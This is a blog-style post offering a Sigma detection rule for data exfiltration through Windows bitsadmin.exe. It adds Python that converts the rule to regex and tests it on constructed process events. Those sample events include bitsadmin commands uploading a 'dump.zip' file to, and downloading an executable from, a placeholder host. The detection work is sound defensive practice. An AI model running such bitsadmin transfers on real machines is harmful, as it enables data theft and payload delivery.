This free Sigma rule detects BITS activity that is being used in a malicious way.
Microsoft BITS (Background Intelligent Transfer Service) is a component present in all modern Microsoft Windows operating systems, driven from the command line with bitsadmin.exe. You can think of it as a built-in “curl” or “wget” for Windows.
BITS transfers files between a server and a client, but it also has a number of more interesting features: jobs run in the background, retry on failure and persist across reboots. A tool that is always available on the box is priceless for attackers, and they have started to use BITS to fetch malicious content from the Internet.
The ability to survive reboots makes it an ideal tool for dropping malicious files onto a compromised Windows workstation, especially since Windows boxes historically shipped without tools like “wget” or “curl” (curl.exe only arrived in recent Windows 10 releases), and web browsers (especially those in corporate environments) may have filters and plugins that block the download of bad files.
Why do I write my detection rule in Sigma format?
Sigma is an open standard for detection rules that describes searches over log data in a generic form. Rules are easily converted to, and applied in, many log management or SIEM systems: the Elastic stack, ArcSight, QRadar, Splunk and Microsoft Sentinel are supported, and a rule can even be turned into a grep pattern for the command line.
I’m sure you know exactly how much hard work goes into making good rules, testing them and hunting for the next threat or exploitation technique.
title: Data Exfiltration with Bitsadmin
description: bitsadmin is a Microsoft HTTP user agent that can be used in a malicious way
author: francesco mancini
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - '*bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY*'
    condition: selection
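As an added example (not code from the original post or from the rule's author), here is the rule's matching logic written out in Python and run over a few constructed process-creation events, so you can see exactly which command lines the selection above does and does not catch. It also emits the regex form of the pattern, which is the "use it with grep" case from the Sigma section. Field names `CommandLine` and `Image` follow the Sysmon/Sigma process_creation convention; the hosts, paths and file names in the sample events are made up.

```python
import re

# Command-line pattern taken from the Sigma rule above (Sigma wildcard syntax).
RULE_PATTERNS = [
    "*bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY*",
]


def sigma_wildcard_to_regex(pattern: str) -> re.Pattern:
    """Translate one Sigma string value into an anchored, case-insensitive regex.

    Sigma semantics: '*' matches any run of characters, '?' any single
    character, a backslash escapes a literal '*', '?' or '\\', everything else
    is literal, and comparison is case-insensitive (important on Windows, where
    'bitsadmin.exe /transfer' and 'BITSADMIN.EXE /TRANSFER' are the same command).
    """
    out = []
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern) and pattern[i + 1] in "*?\\":
            out.append(re.escape(pattern[i + 1]))  # escaped wildcard -> literal
            i += 2
            continue
        if ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        else:
            out.append(re.escape(ch))
        i += 1
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE | re.DOTALL)


def grep_pattern(pattern: str) -> str:
    """Regex source for the 'use it with grep' case, e.g. grep -iE '<pattern>'.

    For the characters this rule uses (letters, digits, '.', '/', space) the
    escaping produced by re.escape is also valid POSIX ERE."""
    return sigma_wildcard_to_regex(pattern).pattern


def compile_rule(patterns=RULE_PATTERNS):
    return [sigma_wildcard_to_regex(p) for p in patterns]


def matches(event: dict, compiled) -> bool:
    """True if the event's CommandLine satisfies any pattern of the selection."""
    cmd = event.get("CommandLine", "")
    return any(rx.match(cmd) for rx in compiled)


# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style);
# hosts, paths and file names are made up for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY HIGH "
                    r"http://example.invalid/up C:\Users\Public\dump.zip"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",      # same job, different case
     "CommandLine": r"BITSADMIN.EXE /transfer HelpCenterUpload /upload /priority normal "
                    r"http://example.invalid/up C:\Temp\a.bin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",      # download job: outside this rule's scope
     "CommandLine": r"bitsadmin.exe /TRANSFER wu /DOWNLOAD /PRIORITY FOREGROUND "
                    r"http://example.invalid/x.exe C:\Temp\x.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
]


def run_rule(events=SAMPLE_EVENTS, patterns=RULE_PATTERNS):
    """Return the events the rule would alert on."""
    compiled = compile_rule(patterns)
    return [e for e in events if matches(e, compiled)]


if __name__ == "__main__":
    print("grep -iE", repr(grep_pattern(RULE_PATTERNS[0])))
    for hit in run_rule():
        print("ALERT:", hit["CommandLine"])
```

Two things worth noting when you deploy it. The rule needs the command line in the log: Sysmon Event ID 1 carries it by default, while Security event 4688 only includes it when process command-line auditing is enabled. And the selection is deliberately narrow: it fires only on an upload job named HelpCenterUpload with the flags in that order, so the third sample event (a BITS download of an executable, the scenario described in the introduction) passes through unmatched; widening the pattern is a trade-off against false positives from legitimate bitsadmin use.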